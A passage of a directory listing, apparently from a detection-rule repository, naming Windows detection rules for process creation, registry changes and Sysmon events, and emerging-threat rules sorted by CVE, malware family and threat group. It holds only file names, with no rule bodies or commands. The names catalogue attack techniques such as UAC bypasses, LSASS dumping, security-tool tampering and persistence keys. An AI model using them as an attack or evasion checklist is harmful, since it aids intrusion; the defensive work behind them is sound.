│ │ ├── proc_creation_win_susp_script_exec_from_env_folder.yml
│ │ ├── proc_creation_win_susp_script_exec_from_temp.yml
│ │ ├── proc_creation_win_susp_sensitive_file_access_shadowcopy.yml
│ │ ├── proc_creation_win_susp_service_creation.yml
│ │ ├── proc_creation_win_susp_service_dir.yml
│ │ ├── proc_creation_win_susp_service_tamper.yml
│ │ ├── proc_creation_win_susp_shadow_copies_creation.yml
│ │ ├── proc_creation_win_susp_shadow_copies_deletion.yml
│ │ ├── proc_creation_win_susp_shell_spawn_susp_program.yml
│ │ ├── proc_creation_win_susp_sysnative.yml
│ │ ├── proc_creation_win_susp_system_exe_anomaly.yml
│ │ ├── proc_creation_win_susp_system_user_anomaly.yml
│ │ ├── proc_creation_win_susp_sysvol_access.yml
│ │ ├── proc_creation_win_susp_task_folder_evasion.yml
│ │ ├── proc_creation_win_susp_use_of_te_bin.yml
│ │ ├── proc_creation_win_susp_use_of_vsjitdebugger_bin.yml
│ │ ├── proc_creation_win_susp_userinit_child.yml
│ │ ├── proc_creation_win_susp_velociraptor_child_process.yml
│ │ ├── proc_creation_win_susp_weak_or_abused_passwords.yml
│ │ ├── proc_creation_win_susp_web_request_cmd_and_cmdlets.yml
│ │ ├── proc_creation_win_susp_whoami_as_param.yml
│ │ ├── proc_creation_win_susp_workfolders.yml
│ │ ├── proc_creation_win_svchost_execution_with_no_cli_flags.yml
│ │ ├── proc_creation_win_svchost_masqueraded_execution.yml
│ │ ├── proc_creation_win_svchost_termserv_proc_spawn.yml
│ │ ├── proc_creation_win_svchost_uncommon_command_line_flags.yml
│ │ ├── proc_creation_win_svchost_uncommon_parent_process.yml
│ │ ├── proc_creation_win_sysinternals_accesschk_check_permissions.yml
│ │ ├── proc_creation_win_sysinternals_adexplorer_execution.yml
│ │ ├── proc_creation_win_sysinternals_adexplorer_susp_execution.yml
│ │ ├── proc_creation_win_sysinternals_eula_accepted.yml
│ │ ├── proc_creation_win_sysinternals_livekd_execution.yml
│ │ ├── proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml
│ │ ├── proc_creation_win_sysinternals_procdump.yml
│ │ ├── proc_creation_win_sysinternals_procdump_evasion.yml
│ │ ├── proc_creation_win_sysinternals_procdump_lsass.yml
│ │ ├── proc_creation_win_sysinternals_psexec_execution.yml
│ │ ├── proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml
│ │ ├── proc_creation_win_sysinternals_psexec_remote_execution.yml
│ │ ├── proc_creation_win_sysinternals_psexesvc.yml
│ │ ├── proc_creation_win_sysinternals_psexesvc_as_system.yml
│ │ ├── proc_creation_win_sysinternals_psloglist.yml
│ │ ├── proc_creation_win_sysinternals_psservice.yml
│ │ ├── proc_creation_win_sysinternals_pssuspend_execution.yml
│ │ ├── proc_creation_win_sysinternals_pssuspend_susp_execution.yml
│ │ ├── proc_creation_win_sysinternals_sdelete.yml
│ │ ├── proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml
│ │ ├── proc_creation_win_sysinternals_sysmon_config_update.yml
│ │ ├── proc_creation_win_sysinternals_sysmon_uninstall.yml
│ │ ├── proc_creation_win_sysinternals_tools_masquerading.yml
│ │ ├── proc_creation_win_sysprep_appdata.yml
│ │ ├── proc_creation_win_systeminfo_execution.yml
│ │ ├── proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml
│ │ ├── proc_creation_win_takeown_recursive_own.yml
│ │ ├── proc_creation_win_tapinstall_execution.yml
│ │ ├── proc_creation_win_tar_compression.yml
│ │ ├── proc_creation_win_tar_extraction.yml
│ │ ├── proc_creation_win_taskkill_sep.yml
│ │ ├── proc_creation_win_tasklist_module_enumeration.yml
│ │ ├── proc_creation_win_taskmgr_localsystem.yml
│ │ ├── proc_creation_win_taskmgr_susp_child_process.yml
│ │ ├── proc_creation_win_teams_suspicious_command_line_cred_access.yml
│ │ ├── proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml
│ │ ├── proc_creation_win_tscon_localsystem.yml
│ │ ├── proc_creation_win_tscon_rdp_redirect.yml
│ │ ├── proc_creation_win_tscon_rdp_session_hijacking.yml
│ │ ├── proc_creation_win_uac_bypass_changepk_slui.yml
│ │ ├── proc_creation_win_uac_bypass_cleanmgr.yml
│ │ ├── proc_creation_win_uac_bypass_cmstp.yml
│ │ ├── proc_creation_win_uac_bypass_cmstp_com_object_access.yml
│ │ ├── proc_creation_win_uac_bypass_computerdefaults.yml
│ │ ├── proc_creation_win_uac_bypass_consent_comctl32.yml
│ │ ├── proc_creation_win_uac_bypass_dismhost.yml
│ │ ├── proc_creation_win_uac_bypass_eventvwr_recentviews.yml
│ │ ├── proc_creation_win_uac_bypass_fodhelper.yml
│ │ ├── proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml
│ │ ├── proc_creation_win_uac_bypass_icmluautil.yml
│ │ ├── proc_creation_win_uac_bypass_idiagnostic_profile.yml
│ │ ├── proc_creation_win_uac_bypass_ieinstal.yml
│ │ ├── proc_creation_win_uac_bypass_msconfig_gui.yml
│ │ ├── proc_creation_win_uac_bypass_ntfs_reparse_point.yml
│ │ ├── proc_creation_win_uac_bypass_pkgmgr_dism.yml
│ │ ├── proc_creation_win_uac_bypass_sdclt.yml
│ │ ├── proc_creation_win_uac_bypass_trustedpath.yml
│ │ ├── proc_creation_win_uac_bypass_winsat.yml
│ │ ├── proc_creation_win_uac_bypass_wmp.yml
│ │ ├── proc_creation_win_uac_bypass_wsreset.yml
│ │ ├── proc_creation_win_uac_bypass_wsreset_integrity_level.yml
│ │ ├── proc_creation_win_ultravnc.yml
│ │ ├── proc_creation_win_ultravnc_susp_execution.yml
│ │ ├── proc_creation_win_uninstall_crowdstrike_falcon.yml
│ │ ├── proc_creation_win_user_shell_folders_registry_modification.yml
│ │ ├── proc_creation_win_userinit_uncommon_child_processes.yml
│ │ ├── proc_creation_win_vaultcmd_list_creds.yml
│ │ ├── proc_creation_win_vbscript_registry_modification.yml
│ │ ├── proc_creation_win_verclsid_runs_com.yml
│ │ ├── proc_creation_win_virtualbox_execution.yml
│ │ ├── proc_creation_win_virtualbox_vboxdrvinst_execution.yml
│ │ ├── proc_creation_win_vmware_toolbox_cmd_persistence.yml
│ │ ├── proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml
│ │ ├── proc_creation_win_vmware_vmtoolsd_susp_child_process.yml
│ │ ├── proc_creation_win_vscode_child_processes_anomalies.yml
│ │ ├── proc_creation_win_vscode_tunnel_execution.yml
│ │ ├── proc_creation_win_vscode_tunnel_remote_shell_.yml
│ │ ├── proc_creation_win_vscode_tunnel_renamed_execution.yml
│ │ ├── proc_creation_win_vscode_tunnel_service_install.yml
│ │ ├── proc_creation_win_vsdiagnostics_execution_proxy.yml
│ │ ├── proc_creation_win_vshadow_exec.yml
│ │ ├── proc_creation_win_vslsagent_agentextensionpath_load.yml
│ │ ├── proc_creation_win_vulnerable_driver_blocklist_registry_tampering.yml
│ │ ├── proc_creation_win_w32tm.yml
│ │ ├── proc_creation_win_wab_execution_from_non_default_location.yml
│ │ ├── proc_creation_win_wab_unusual_parents.yml
│ │ ├── proc_creation_win_wbadmin_delete_all_backups.yml
│ │ ├── proc_creation_win_wbadmin_delete_backups.yml
│ │ ├── proc_creation_win_wbadmin_dump_sensitive_files.yml
│ │ ├── proc_creation_win_wbadmin_restore_file.yml
│ │ ├── proc_creation_win_wbadmin_restore_sensitive_files.yml
│ │ ├── proc_creation_win_webdav_lnk_execution.yml
│ │ ├── proc_creation_win_webshell_chopper.yml
│ │ ├── proc_creation_win_webshell_hacking.yml
│ │ ├── proc_creation_win_webshell_recon_commands_and_processes.yml
│ │ ├── proc_creation_win_webshell_susp_process_spawned_from_webserver.yml
│ │ ├── proc_creation_win_webshell_tool_recon.yml
│ │ ├── proc_creation_win_werfault_lsass_shtinkering.yml
│ │ ├── proc_creation_win_werfault_reflect_debugger_exec.yml
│ │ ├── proc_creation_win_werfaultsecure_abuse.yml
│ │ ├── proc_creation_win_wermgr_susp_child_process.yml
│ │ ├── proc_creation_win_wermgr_susp_exec_location.yml
│ │ ├── proc_creation_win_wget_download_direct_ip.yml
│ │ ├── proc_creation_win_wget_download_susp_file_sharing_domains.yml
│ │ ├── proc_creation_win_wget_download_susp_locations.yml
│ │ ├── proc_creation_win_where_browser_data_recon.yml
│ │ ├── proc_creation_win_whoami_all_execution.yml
│ │ ├── proc_creation_win_whoami_execution_from_high_priv_process.yml
│ │ ├── proc_creation_win_whoami_groups_discovery.yml
│ │ ├── proc_creation_win_whoami_output.yml
│ │ ├── proc_creation_win_whoami_parent_anomaly.yml
│ │ ├── proc_creation_win_whoami_priv_discovery.yml
│ │ ├── proc_creation_win_windows_terminal_susp_children.yml
│ │ ├── proc_creation_win_winget_add_custom_source.yml
│ │ ├── proc_creation_win_winget_add_insecure_custom_source.yml
│ │ ├── proc_creation_win_winget_add_susp_custom_source.yml
│ │ ├── proc_creation_win_winget_local_install_via_manifest.yml
│ │ ├── proc_creation_win_winrar_exfil_dmp_files.yml
│ │ ├── proc_creation_win_winrar_susp_child_process.yml
│ │ ├── proc_creation_win_winrar_uncommon_folder_execution.yml
│ │ ├── proc_creation_win_winrm_awl_bypass.yml
│ │ ├── proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml
│ │ ├── proc_creation_win_winrm_remote_powershell_session_process.yml
│ │ ├── proc_creation_win_winrm_susp_child_process.yml
│ │ ├── proc_creation_win_winrs_local_command_execution.yml
│ │ ├── proc_creation_win_winrshost_command_execution.yml
│ │ ├── proc_creation_win_winzip_password_compression.yml
│ │ ├── proc_creation_win_wlrmdr_uncommon_child_process.yml
│ │ ├── proc_creation_win_wmi_backdoor_exchange_transport_agent.yml
│ │ ├── proc_creation_win_wmi_password_never_expire.yml
│ │ ├── proc_creation_win_wmi_persistence_script_event_consumer.yml
│ │ ├── proc_creation_win_wmic_eventconsumer_creation.yml
│ │ ├── proc_creation_win_wmic_namespace_defender.yml
│ │ ├── proc_creation_win_wmic_process_creation.yml
│ │ ├── proc_creation_win_wmic_recon_computersystem.yml
│ │ ├── proc_creation_win_wmic_recon_csproduct.yml
│ │ ├── proc_creation_win_wmic_recon_group.yml
│ │ ├── proc_creation_win_wmic_recon_hotfix.yml
│ │ ├── proc_creation_win_wmic_recon_process.yml
│ │ ├── proc_creation_win_wmic_recon_product.yml
│ │ ├── proc_creation_win_wmic_recon_product_class.yml
│ │ ├── proc_creation_win_wmic_recon_service.yml
│ │ ├── proc_creation_win_wmic_recon_system_info_uncommon.yml
│ │ ├── proc_creation_win_wmic_recon_unquoted_service_search.yml
│ │ ├── proc_creation_win_wmic_recon_volume.yml
│ │ ├── proc_creation_win_wmic_remote_execution.yml
│ │ ├── proc_creation_win_wmic_service_manipulation.yml
│ │ ├── proc_creation_win_wmic_squiblytwo_bypass.yml
│ │ ├── proc_creation_win_wmic_stdregprov_reg_modification.yml
│ │ ├── proc_creation_win_wmic_susp_execution_via_office_process.yml
│ │ ├── proc_creation_win_wmic_susp_process_creation.yml
│ │ ├── proc_creation_win_wmic_terminate_application.yml
│ │ ├── proc_creation_win_wmic_uninstall_application.yml
│ │ ├── proc_creation_win_wmic_uninstall_security_products.yml
│ │ ├── proc_creation_win_wmic_xsl_script_processing.yml
│ │ ├── proc_creation_win_wmiprvse_spawning_process.yml
│ │ ├── proc_creation_win_wmiprvse_spawns_powershell.yml
│ │ ├── proc_creation_win_wmiprvse_susp_child_processes.yml
│ │ ├── proc_creation_win_wpbbin_potential_persistence.yml
│ │ ├── proc_creation_win_wscript_cscript_dropper.yml
│ │ ├── proc_creation_win_wscript_cscript_susp_child_processes.yml
│ │ ├── proc_creation_win_wscript_cscript_uncommon_extension_exec.yml
│ │ ├── proc_creation_win_wsl_child_processes_anomalies.yml
│ │ ├── proc_creation_win_wsl_kali_linux_installation.yml
│ │ ├── proc_creation_win_wsl_kali_linux_usage.yml
│ │ ├── proc_creation_win_wsl_windows_binaries_execution.yml
│ │ ├── proc_creation_win_wuauclt_dll_loading.yml
│ │ ├── proc_creation_win_wuauclt_no_cli_flags_execution.yml
│ │ ├── proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml
│ │ ├── proc_creation_win_wusa_susp_parent_execution.yml
│ │ ├── proc_creation_win_xwizard_execution_non_default_location.yml
│ │ └── proc_creation_win_xwizard_runwizard_com_object_exec.yml
│ ├── process_tampering/
│ │ └── proc_tampering_susp_process_hollowing.yml
│ ├── raw_access_thread/
│ │ └── raw_access_thread_susp_disk_access_using_uncommon_tools.yml
│ ├── registry/
│ │ ├── registry_add/
│ │ │ └── registry_add_persistence_disk_cleanup_handler_entry.yml
│ │ ├── registry_delete/
│ │ │ ├── registry_delete_defender_context_menu.yml
│ │ │ ├── registry_delete_disable_credential_guard.yml
│ │ │ ├── registry_delete_enable_windows_recall.yml
│ │ │ ├── registry_delete_exploit_guard_protected_folders.yml
│ │ │ ├── registry_delete_mstsc_history_cleared.yml
│ │ │ ├── registry_delete_removal_amsi_registry_key.yml
│ │ │ ├── registry_delete_removal_com_hijacking_registry_key.yml
│ │ │ ├── registry_delete_runmru.yml
│ │ │ ├── registry_delete_schtasks_hide_task_via_index_value_removal.yml
│ │ │ └── registry_delete_schtasks_hide_task_via_sd_value_removal.yml
│ │ ├── registry_event/
│ │ │ ├── registry_event_add_local_hidden_user.yml
│ │ │ ├── registry_event_bypass_via_wsreset.yml
│ │ │ ├── registry_event_cmstp_execution_by_registry.yml
│ │ │ ├── registry_event_defender_threat_action_modified.yml
│ │ │ ├── registry_event_disable_security_events_logging_adding_reg_key_minint.yml
│ │ │ ├── registry_event_disable_wdigest_credential_guard.yml
│ │ │ ├── registry_event_esentutl_volume_shadow_copy_service_keys.yml
│ │ │ ├── registry_event_hack_wce_reg.yml
│ │ │ ├── registry_event_hybridconnectionmgr_svc_installation.yml
│ │ │ ├── registry_event_mal_azorult.yml
│ │ │ ├── registry_event_malware_qakbot_registry.yml
│ │ │ ├── registry_event_modify_screensaver_binary_path.yml
│ │ │ ├── registry_event_narrator_feedback_persistance.yml
│ │ │ ├── registry_event_net_ntlm_downgrade.yml
│ │ │ ├── registry_event_new_dll_added_to_appcertdlls_registry_key.yml
│ │ │ ├── registry_event_new_dll_added_to_appinit_dlls_registry_key.yml
│ │ │ ├── registry_event_office_test_regadd.yml
│ │ │ ├── registry_event_office_trust_record_modification.yml
│ │ │ ├── registry_event_persistence_recycle_bin.yml
│ │ │ ├── registry_event_portproxy_registry_key.yml
│ │ │ ├── registry_event_redmimicry_winnti_reg.yml
│ │ │ ├── registry_event_runkey_winekey.yml
│ │ │ ├── registry_event_runonce_persistence.yml
│ │ │ ├── registry_event_shell_open_keys_manipulation.yml
│ │ │ ├── registry_event_silentprocessexit_lsass.yml
│ │ │ ├── registry_event_ssp_added_lsa_config.yml
│ │ │ ├── registry_event_stickykey_like_backdoor.yml
│ │ │ ├── registry_event_susp_atbroker_change.yml
│ │ │ ├── registry_event_susp_download_run_key.yml
│ │ │ ├── registry_event_susp_lsass_dll_load.yml
│ │ │ ├── registry_event_susp_mic_cam_access.yml
│ │ │ ├── registry_event_susp_process_registry_modification.yml
│ │ │ └── registry_set_enable_anonymous_connection.yml
│ │ └── registry_set/
│ │ ├── registry_set_add_load_service_in_safe_mode.yml
│ │ ├── registry_set_add_port_monitor.yml
│ │ ├── registry_set_aedebug_persistence.yml
│ │ ├── registry_set_allow_rdp_remote_assistance_feature.yml
│ │ ├── registry_set_amsi_com_hijack.yml
│ │ ├── registry_set_amsi_disable.yml
│ │ ├── registry_set_asep_reg_keys_modification_classes.yml
│ │ ├── registry_set_asep_reg_keys_modification_common.yml
│ │ ├── registry_set_asep_reg_keys_modification_currentcontrolset.yml
│ │ ├── registry_set_asep_reg_keys_modification_currentversion.yml
│ │ ├── registry_set_asep_reg_keys_modification_currentversion_nt.yml
│ │ ├── registry_set_asep_reg_keys_modification_internet_explorer.yml
│ │ ├── registry_set_asep_reg_keys_modification_office.yml
│ │ ├── registry_set_asep_reg_keys_modification_session_manager.yml
│ │ ├── registry_set_asep_reg_keys_modification_system_scripts.yml
│ │ ├── registry_set_asep_reg_keys_modification_winsock2.yml
│ │ ├── registry_set_asep_reg_keys_modification_wow6432node.yml
│ │ ├── registry_set_asep_reg_keys_modification_wow6432node_classes.yml
│ │ ├── registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml
│ │ ├── registry_set_bginfo_custom_db.yml
│ │ ├── registry_set_bginfo_custom_vbscript.yml
│ │ ├── registry_set_bginfo_custom_wmi_query.yml
│ │ ├── registry_set_bypass_uac_using_delegateexecute.yml
│ │ ├── registry_set_bypass_uac_using_eventviewer.yml
│ │ ├── registry_set_bypass_uac_using_silentcleanup_task.yml
│ │ ├── registry_set_change_rdp_port.yml
│ │ ├── registry_set_change_security_zones.yml
│ │ ├── registry_set_change_sysmon_driver_altitude.yml
│ │ ├── registry_set_change_winevt_channelaccess.yml
│ │ ├── registry_set_chrome_extension.yml
│ │ ├── registry_set_clickonce_trust_prompt.yml
│ │ ├── registry_set_cobaltstrike_service_installs.yml
│ │ ├── registry_set_comhijack_sdclt.yml
│ │ ├── registry_set_crashdump_disabled.yml
│ │ ├── registry_set_create_minint_key.yml
│ │ ├── registry_set_creation_service_susp_folder.yml
│ │ ├── registry_set_credential_guard_disabled.yml
│ │ ├── registry_set_custom_file_open_handler_powershell_execution.yml
│ │ ├── registry_set_dbgmanageddebugger_persistence.yml
│ │ ├── registry_set_defender_exclusions.yml
│ │ ├── registry_set_desktop_background_change.yml
│ │ ├── registry_set_devdrv_disallow_antivirus_filter.yml
│ │ ├── registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml
│ │ ├── registry_set_deviceguard_hypervisorenforcedpagingtranslation_disabled.yml
│ │ ├── registry_set_dhcp_calloutdll.yml
│ │ ├── registry_set_disable_administrative_share.yml
│ │ ├── registry_set_disable_autologger_sessions.yml
│ │ ├── registry_set_disable_defender_firewall.yml
│ │ ├── registry_set_disable_function_user.yml
│ │ ├── registry_set_disable_macroruntimescanscope.yml
│ │ ├── registry_set_disable_privacy_settings_experience.yml
│ │ ├── registry_set_disable_security_center_notifications.yml
│ │ ├── registry_set_disable_system_restore.yml
│ │ ├── registry_set_disable_windows_defender_service.yml
│ │ ├── registry_set_disable_windows_event_log_access.yml
│ │ ├── registry_set_disable_windows_firewall.yml
│ │ ├── registry_set_disable_winevt_logging.yml
│ │ ├── registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml
│ │ ├── registry_set_disabled_microsoft_defender_eventlog.yml
│ │ ├── registry_set_disabled_pua_protection_on_microsoft_defender.yml
│ │ ├── registry_set_disabled_tamper_protection_on_microsoft_defender.yml
│ │ ├── registry_set_disallowrun_execution.yml
│ │ ├── registry_set_disk_cleanup_handler_autorun_persistence.yml
│ │ ├── registry_set_dns_over_https_enabled.yml
│ │ ├── registry_set_dns_server_level_plugin_dll.yml
│ │ ├── registry_set_dot_net_etw_tamper.yml
│ │ ├── registry_set_dsrm_tampering.yml
│ │ ├── registry_set_enable_periodic_backup.yml
│ │ ├── registry_set_enable_windows_recall.yml
│ │ ├── registry_set_enabling_cor_profiler_env_variables.yml
│ │ ├── registry_set_enabling_turnoffcheck.yml
│ │ ├── registry_set_evtx_file_key_tamper.yml
│ │ ├── registry_set_exploit_guard_susp_allowed_apps.yml
│ │ ├── registry_set_fax_change_service_user.yml
│ │ ├── registry_set_fax_dll_persistance.yml
│ │ ├── registry_set_file_association_exefile.yml
│ │ ├── registry_set_filefix_typedpath_commands.yml
│ │ ├── registry_set_hangs_debugger_persistence.yml
│ │ ├── registry_set_hhctrl_persistence.yml
│ │ ├── registry_set_hidden_extention.yml
│ │ ├── registry_set_hide_file.yml
│ │ ├── registry_set_hide_function_user.yml
│ │ ├── registry_set_hide_scheduled_task_via_index_tamper.yml
│ │ ├── registry_set_hvci_disallowed_images.yml
│ │ ├── registry_set_ie_security_zone_protocol_defaults_downgrade.yml
│ │ ├── registry_set_ime_non_default_extension.yml
│ │ ├── registry_set_ime_suspicious_paths.yml
│ │ ├── registry_set_install_root_or_ca_certificat.yml
│ │ ├── registry_set_internet_explorer_disable_first_run_customize.yml
│ │ ├── registry_set_legalnotice_susp_message.yml
│ │ ├── registry_set_lolbin_onedrivestandaloneupdater.yml
│ │ ├── registry_set_lsa_disablerestrictedadmin.yml
│ │ ├── registry_set_lsass_usermode_dumping.yml
│ │ ├── registry_set_net_cli_ngenassemblyusagelog.yml
│ │ ├── registry_set_netsh_help_dll_persistence_susp_location.yml
│ │ ├── registry_set_netsh_helper_dll_potential_persistence.yml
│ │ ├── registry_set_new_application_appcompat.yml
│ │ ├── registry_set_new_network_provider.yml
│ │ ├── registry_set_odbc_driver_registered.yml
│ │ ├── registry_set_odbc_driver_registered_susp.yml
│ │ ├── registry_set_office_access_vbom_tamper.yml
│ │ ├── registry_set_office_disable_protected_view_features.yml
│ │ ├── registry_set_office_disable_python_security_warnings.yml
│ │ ├── registry_set_office_enable_dde.yml
│ │ ├── registry_set_office_outlook_enable_load_macro_provider_on_boot.yml
│ │ ├── registry_set_office_outlook_enable_macro_execution.yml
│ │ ├── registry_set_office_outlook_enable_unsafe_client_mail_rules.yml
│ │ ├── registry_set_office_outlook_security_settings.yml
│ │ ├── registry_set_office_trust_record_susp_location.yml
│ │ ├── registry_set_office_trusted_location_uncommon.yml
│ │ ├── registry_set_office_vba_warnings_tamper.yml
│ │ ├── registry_set_optimize_file_sharing_network.yml
│ │ ├── registry_set_persistence_amsi_providers.yml
│ │ ├── registry_set_persistence_app_cpmpat_layer_registerapprestart.yml
│ │ ├── registry_set_persistence_app_paths.yml
│ │ ├── registry_set_persistence_appx_debugger.yml
│ │ ├── registry_set_persistence_autodial_dll.yml
│ │ ├── registry_set_persistence_chm.yml
│ │ ├── registry_set_persistence_com_hijacking_builtin.yml
│ │ ├── registry_set_persistence_com_key_linking.yml
│ │ ├── registry_set_persistence_comhijack_psfactorybuffer.yml
│ │ ├── registry_set_persistence_custom_protocol_handler.yml
│ │ ├── registry_set_persistence_event_viewer_events_asp.yml
│ │ ├── registry_set_persistence_globalflags.yml
│ │ ├── registry_set_persistence_ie.yml
│ │ ├── registry_set_persistence_ifilter.yml
│ │ ├── registry_set_persistence_logon_scripts_userinitmprlogonscript.yml
│ │ ├── registry_set_persistence_lsa_extension.yml
│ │ ├── registry_set_persistence_mpnotify.yml
│ │ ├── registry_set_persistence_mycomputer.yml
│ │ ├── registry_set_persistence_natural_language.yml
│ │ ├── registry_set_persistence_office_vsto.yml
│ │ ├── registry_set_persistence_outlook_homepage.yml
│ │ ├── registry_set_persistence_outlook_todaypage.yml
│ │ ├── registry_set_persistence_reflectdebugger.yml
│ │ ├── registry_set_persistence_scrobj_dll.yml
│ │ ├── registry_set_persistence_shim_database.yml
│ │ ├── registry_set_persistence_shim_database_susp_application.yml
│ │ ├── registry_set_persistence_shim_database_uncommon_location.yml
│ │ ├── registry_set_persistence_typed_paths.yml
│ │ ├── registry_set_persistence_xll.yml
│ │ ├── registry_set_policies_associations_tamper.yml
│ │ ├── registry_set_policies_attachments_tamper.yml
│ │ ├── registry_set_potential_clickfix_execution.yml
│ │ ├── registry_set_potential_oci_dll_redirection.yml
│ │ ├── registry_set_powershell_as_service.yml
│ │ ├── registry_set_powershell_enablescripts_enabled.yml
│ │ ├── registry_set_powershell_execution_policy.yml
│ │ ├── registry_set_powershell_in_run_keys.yml
│ │ ├── registry_set_powershell_logging_disabled.yml
│ │ ├── registry_set_provisioning_command_abuse.yml
│ │ ├── registry_set_pua_sysinternals_execution_via_eula.yml
│ │ ├── registry_set_pua_sysinternals_renamed_execution_via_eula.yml
│ │ ├── registry_set_pua_sysinternals_susp_execution_via_eula.yml
│ │ ├── registry_set_renamed_sysinternals_eula_accepted.yml
│ │ ├── registry_set_rpcrt4_etw_tamper.yml
│ │ ├── registry_set_runmru_susp_command_execution.yml
│ │ ├── registry_set_scr_file_executed_by_rundll32.yml
│ │ ├── registry_set_sentinelone_shell_context_tampering.yml
│ │ ├── registry_set_servicedll_hijack.yml
│ │ ├── registry_set_services_etw_tamper.yml
│ │ ├── registry_set_set_nopolicies_user.yml
│ │ ├── registry_set_sip_persistence.yml
│ │ ├── registry_set_sophos_av_tamper.yml
│ │ ├── registry_set_special_accounts.yml
│ │ ├── registry_set_suppress_defender_notifications.yml
│ │ ├── registry_set_susp_keyboard_layout_load.yml
│ │ ├── registry_set_susp_pendingfilerenameoperations.yml
│ │ ├── registry_set_susp_printer_driver.yml
│ │ ├── registry_set_susp_reg_persist_explorer_run.yml
│ │ ├── registry_set_susp_run_key_img_folder.yml
│ │ ├── registry_set_susp_runmru_space_character.yml
│ │ ├── registry_set_susp_service_installed.yml
│ │ ├── registry_set_susp_shell_open_keys_modification_patterns.yml
│ │ ├── registry_set_susp_typedpaths_space_characters.yml
│ │ ├── registry_set_susp_user_shell_folders.yml
│ │ ├── registry_set_susp_wfp_filter_added.yml
│ │ ├── registry_set_suspicious_env_variables.yml
│ │ ├── registry_set_system_lsa_nolmhash.yml
│ │ ├── registry_set_taskcache_entry.yml
│ │ ├── registry_set_telemetry_persistence.yml
│ │ ├── registry_set_terminal_server_suspicious.yml
│ │ ├── registry_set_terminal_server_tampering.yml
│ │ ├── registry_set_timeproviders_dllname.yml
│ │ ├── registry_set_tls_protocol_old_version_enabled.yml
│ │ ├── registry_set_treatas_persistence.yml
│ │ ├── registry_set_turn_on_dev_features.yml
│ │ ├── registry_set_uac_bypass_eventvwr.yml
│ │ ├── registry_set_uac_bypass_sdclt.yml
│ │ ├── registry_set_uac_bypass_winsat.yml
│ │ ├── registry_set_uac_bypass_wmp.yml
│ │ ├── registry_set_uac_disable.yml
│ │ ├── registry_set_uac_disable_notification.yml
│ │ ├── registry_set_uac_disable_secure_desktop_prompt.yml
│ │ ├── registry_set_vbs_payload_stored.yml
│ │ ├── registry_set_vulnerable_driver_blocklist_disable.yml
│ │ ├── registry_set_wab_dllpath_reg_change.yml
│ │ ├── registry_set_wdigest_enable_uselogoncredential.yml
│ │ ├── registry_set_windows_defender_tamper.yml
│ │ ├── registry_set_winget_admin_settings_tampering.yml
│ │ ├── registry_set_winget_enable_local_manifest.yml
│ │ ├── registry_set_winlogon_allow_multiple_tssessions.yml
│ │ └── registry_set_winlogon_notify_key.yml
│ ├── sysmon/
│ │ ├── sysmon_config_modification.yml
│ │ ├── sysmon_config_modification_error.yml
│ │ ├── sysmon_config_modification_status.yml
│ │ ├── sysmon_file_block_executable.yml
│ │ ├── sysmon_file_block_shredding.yml
│ │ └── sysmon_file_executable_detected.yml
│ └── wmi_event/
│ ├── sysmon_wmi_event_subscription.yml
│ ├── sysmon_wmi_susp_encoded_scripts.yml
│ └── sysmon_wmi_susp_scripting.yml
├── rules-compliance/
│ ├── README.md
│ ├── other/
│ │ └── netflow_cleartext_protocols.yml
│ └── product/
│ └── qualys/
│ ├── qualys_default_credentials_usage.yml
│ └── qualys_host_without_firewall.yml
├── rules-dfir/
│ └── README.md
├── rules-emerging-threats/
│ ├── 2010/
│ │ └── Exploits/
│ │ └── CVE-2010-5278/
│ │ └── web_cve_2010_5278_exploitation_attempt.yml
│ ├── 2014/
│ │ ├── Exploits/
│ │ │ └── CVE-2014-6287/
│ │ │ └── web_cve_2014_6287_hfs_rce.yml
│ │ └── TA/
│ │ ├── Axiom/
│ │ │ └── proc_creation_win_apt_zxshell.yml
│ │ └── Turla/
│ │ ├── proc_creation_win_apt_turla_commands_critical.yml
│ │ └── proc_creation_win_apt_turla_comrat_may20.yml
│ ├── 2015/
│ │ └── Exploits/
│ │ └── CVE-2015-1641/
│ │ └── proc_creation_win_exploit_cve_2015_1641.yml
│ ├── 2017/
│ │ ├── Exploits/
│ │ │ ├── CVE-2017-0261/
│ │ │ │ └── proc_creation_win_exploit_cve_2017_0261.yml
│ │ │ ├── CVE-2017-11882/
│ │ │ │ └── proc_creation_win_exploit_cve_2017_11882.yml
│ │ │ └── CVE-2017-8759/
│ │ │ └── proc_creation_win_exploit_cve_2017_8759.yml
│ │ ├── Malware/
│ │ │ ├── Adwind-RAT/
│ │ │ │ └── proc_creation_win_malware_adwind.yml
│ │ │ ├── CosmicDuke/
│ │ │ │ └── win_security_mal_cosmik_duke_persistence.yml
│ │ │ ├── Fireball/
│ │ │ │ └── proc_creation_win_malware_fireball.yml
│ │ │ ├── Hancitor/
│ │ │ │ └── proc_access_win_malware_verclsid_shellcode.yml
│ │ │ ├── NotPetya/
│ │ │ │ └── proc_creation_win_malware_notpetya.yml
│ │ │ ├── PlugX/
│ │ │ │ └── proc_creation_win_malware_plugx_susp_exe_locations.yml
│ │ │ ├── StoneDrill/
│ │ │ │ └── win_system_apt_stonedrill.yml
│ │ │ └── WannaCry/
│ │ │ └── proc_creation_win_malware_wannacry.yml
│ │ └── TA/
│ │ ├── APT10/
│ │ │ └── proc_creation_win_apt_apt10_cloud_hopper.yml
│ │ ├── Dragonfly/
│ │ │ └── proc_creation_win_apt_ta17_293a_ps.yml
│ │ ├── Equation-Group/
│ │ │ └── net_firewall_apt_equationgroup_c2.yml
│ │ ├── Lazarus/
│ │ │ └── proc_creation_win_apt_lazarus_binary_masquerading.yml
│ │ ├── Pandemic/
│ │ │ └── registry_event_apt_pandemic.yml
│ │ └── Turla/
│ │ ├── pipe_created_apt_turla_named_pipes.yml
│ │ ├── win_system_apt_carbonpaper_turla.yml
│ │ └── win_system_apt_turla_service_png.yml
│ ├── 2018/
│ │ ├── Exploits/
│ │ │ ├── CVE-2018-13379/
│ │ │ │ └── web_cve_2018_13379_fortinet_preauth_read_exploit.yml
│ │ │ ├── CVE-2018-15473/
